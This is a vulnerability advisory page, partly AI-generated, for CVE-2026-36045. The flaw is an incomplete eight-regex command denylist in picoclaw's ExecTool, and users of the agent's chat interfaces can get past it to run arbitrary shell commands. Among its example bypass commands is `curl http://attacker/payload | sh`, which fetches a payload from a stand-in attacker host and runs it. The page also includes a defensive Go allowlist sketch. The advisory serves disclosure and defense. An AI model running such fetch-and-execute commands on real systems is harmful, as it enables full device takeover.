CVE-2026-36045
Description
picoclaw v0.1.2 and earlier is vulnerable to OS command injection via the ExecTool component (pkg/tools/shell.go). The guardCommand() function attempts to restrict shell command execution using a denylist of 8 regular expressions, but the denylist is incomplete.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
picoclaw v0.1.2 and earlier contain an OS command injection in ExecTool due to an incomplete denylist of 8 regex patterns.
Vulnerability
picoclaw versions <=v0.1.2 (commit da79c20) are vulnerable to OS command injection via the ExecTool component in pkg/tools/shell.go. The guardCommand() function attempts to restrict shell command execution using a denylist of exactly 8 regular expressions that only cover disk-destruction commands such as rm -rf, dd, format, writes to /dev/sdX, shutdown, and fork bombs. No patterns address shell invocation, privilege escalation, scripting languages, or remote code download, making the denylist incomplete [1].
Exploitation
An attacker with access to the agent interface (Telegram, Discord, Slack, LINE, WhatsApp, DingTalk, or the direct API) can send a trivial one-liner that bypasses the guard entirely. No special network position or authentication beyond normal agent access is required. The attacker simply crafts a shell command that does not match any of the eight denylist patterns, resulting in arbitrary OS command execution on the host [1].
Impact
Successful exploitation allows an attacker to achieve arbitrary OS command execution with the privileges of the picoclaw process. On Sipeed LicheeRV Nano and similar embedded devices, the process often runs as root, granting full device control including physical hardware manipulation via the I2C and SPI tools in the same package (pkg/tools/i2c.go, pkg/tools/spi.go). The CVSS v3.1 score is 8.8 (HIGH) with a vector of AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H [1].
Mitigation
No fixed version has been released as of the publication date (2026-05-27). The affected version v0.1.2 (released 2025-02-17) is the latest available. No workaround has been disclosed in the available references. Users should monitor for updates from the vendor [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0. No patches discovered yet.
Vulnerability mechanics
Root cause
"Incomplete denylist in guardCommand() — only 8 regex patterns covering disk-destruction commands, with no coverage for shell invocation, scripting languages, or remote code download."
Attack vector
An attacker with access to any agent interface (Telegram, Discord, Slack, LINE, WhatsApp, DingTalk, or the direct API) can send a trivial one-liner that bypasses the incomplete denylist [1]. The denylist only blocks 8 specific destructive patterns, so commands like `bash -c 'malicious command'`, `python3 -c '...'`, `curl http://attacker/payload | sh`, or any arbitrary shell command that does not match the 8 regexes will execute freely [1]. On Sipeed LicheeRV Nano and similar embedded targets where picoclaw runs as root, the attacker gains full device control including physical hardware manipulation via I2C and SPI tools in the same package [1].
Affected code
The vulnerability resides in `pkg/tools/shell.go` at commit `da79c201c75a91d5c54158419dfcdf3bb45e0c8b` (v0.1.2). The `guardCommand()` function implements a denylist of exactly 8 regular expressions that exclusively target disk-destruction commands (`rm -rf`, `dd`, `format`, writes to `/dev/sdX`, shutdown, fork bomb) [1]. The denylist contains zero patterns addressing shell invocation, privilege escalation, scripting languages, or remote code download [1].
What the fix does
No patch or fixed version has been released by the vendor as of the advisory publication [1]. The advisory recommends replacing the incomplete denylist approach with an allowlist of explicitly permitted commands, or implementing proper input sanitization and command parameterization [1]. Until a fix is published, the only mitigation is to avoid exposing the ExecTool to untrusted users or to disable the ExecTool entirely [1].
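The advisory's recommendation, sketched as an added example (not picoclaw's code and not a vendor fix): a denylist guard next to an allowlist guard that returns an argv for shell-free execution. The regex patterns, the `allowed` policy and both function names are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Constructed stand-ins for a destructive-command denylist; not picoclaw's actual patterns.
var denylist = []*regexp.Regexp{
	regexp.MustCompile(`\brm\s+-[rf]+\b`),
	regexp.MustCompile(`\bdd\s+if=`),
}

// denylistGuard permits every command that matches no pattern (the weak design).
func denylistGuard(cmd string) error {
	for _, re := range denylist {
		if re.MatchString(cmd) {
			return errors.New("blocked by denylist")
		}
	}
	return nil
}

// allowed maps each permitted binary to a validator for its arguments (hypothetical policy).
var allowed = map[string]func(args []string) bool{
	"uptime": func(a []string) bool { return len(a) == 0 },
	"df":     func(a []string) bool { return len(a) == 0 || (len(a) == 1 && a[0] == "-h") },
}

// allowlistGuard returns an argv to be executed without a shell, or an error (default deny).
func allowlistGuard(cmd string) ([]string, error) {
	if strings.ContainsAny(cmd, "|&;<>$`\\\"'(){}*?~\n") {
		return nil, errors.New("shell metacharacter rejected")
	}
	argv := strings.Fields(cmd)
	if len(argv) == 0 || allowed[argv[0]] == nil || !allowed[argv[0]](argv[1:]) {
		return nil, fmt.Errorf("%q is not permitted", cmd)
	}
	return argv, nil
}

func main() {
	for _, c := range []string{"df -h", "bash -c 'id'", "python3 -c pass", "df -h; uptime"} {
		_, err := allowlistGuard(c)
		fmt.Printf("%-18q denylist=%v allowlist=%v\n", c, denylistGuard(c), err)
	}
}
```

The returned argv is meant for `exec.Command(argv[0], argv[1:]...)`, which starts the binary directly instead of handing the string to a shell.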
Preconditions
- network: Attacker must have access to an agent interface (Telegram, Discord, Slack, LINE, WhatsApp, DingTalk, or the direct API)
- config: The ExecTool must be enabled and the restrict flag must be set to true (the denylist is still bypassable)
- auth: No authentication or privilege escalation is needed beyond access to the agent interface
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 2
News mentions: 0. No linked articles in our index yet.